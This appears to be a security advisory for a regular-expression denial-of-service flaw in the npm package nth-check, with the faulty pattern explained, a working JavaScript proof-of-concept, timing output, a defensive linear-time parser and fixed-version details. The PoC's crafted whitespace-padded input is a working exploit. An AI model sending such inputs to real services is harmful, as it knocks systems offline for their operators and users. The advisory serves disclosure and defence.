Description
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
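The ReDoS vulnerability in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency: because the sign between them is optional, the two \s* quantifiers sit next to each other and can both match the same run of whitespace. It can be exploited with the following code.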
Proof of Concept
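// PoC.js
var nthCheck = require("nth-check");
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n", then a growing run of spaces, then "!" which makes the formula invalid
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    }
    catch (err) {
        // parse() throws on the invalid input; report how long the attempt took
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}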
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
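A defensive counterpart to the PoC above, as an added example that is not from the advisory or from nth-check: a single-pass parser for the "an+b" formula that reads each character once, so no two quantifiers compete for the same whitespace, and that caps input length before any parsing. The names parseNth and MAX_LEN and the 256-character cap are assumptions made for this illustration.

```javascript
// Added example (not nth-check's own code): single-pass parser for "an+b".
// parseNth and MAX_LEN are hypothetical names chosen for this illustration.
const MAX_LEN = 256; // assumed cap; real formulas are a handful of characters

function parseNth(formula) {
  if (typeof formula !== "string" || formula.length > MAX_LEN) {
    throw new Error("nth formula rejected: not a string or too long");
  }
  const s = formula.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  let i = 0; // cursor; it only ever moves forward, so work is linear in s.length
  const isWs = (c) => " \t\n\r\f".includes(c);
  const skipWs = () => { while (i < s.length && isWs(s[i])) i++; };
  const readSign = () => {
    if (s[i] === "+" || s[i] === "-") return s[i++] === "-" ? -1 : 1;
    return 1;
  };
  // Returns null when no digit is present at the cursor.
  const readInt = () => {
    const start = i;
    while (i < s.length && s[i] >= "0" && s[i] <= "9") i++;
    return i > start ? parseInt(s.slice(start, i), 10) : null;
  };

  let a = 0;
  let sign = readSign();
  let num = readInt();
  if (s[i] === "n") {
    i++;
    a = sign * (num === null ? 1 : num); // "n" alone means 1n, "-n" means -1n
    skipWs();
    if (i < s.length) { // optional "+ b" / "- b" part
      sign = readSign();
      skipWs();
      num = readInt();
    } else {
      sign = 1; num = 0;
    }
  }
  if (num === null || i < s.length) {
    throw new Error("nth formula rejected: invalid syntax");
  }
  return [a, sign * num];
}

console.log(parseNth("2n + 1")); // constructed sample input
```

The PoC's input shape ("2n", a run of spaces, then "!") is rejected here after one pass over the whitespace; for applications that depend on nth-check itself, the fixed version listed on this page is 2.0.1.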
Packages
Name: nth-check (npm)
Affected versions: < 2.0.1
Fixed version: 2.0.1
Related vulnerabilities
CVSS3: 7.5
ubuntu
more than 4 years ago
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
redhat
more than 4 years ago
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
nvd
more than 4 years ago
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
debian
more than 4 years ago
nth-check is vulnerable to Inefficient Regular Expression Complexity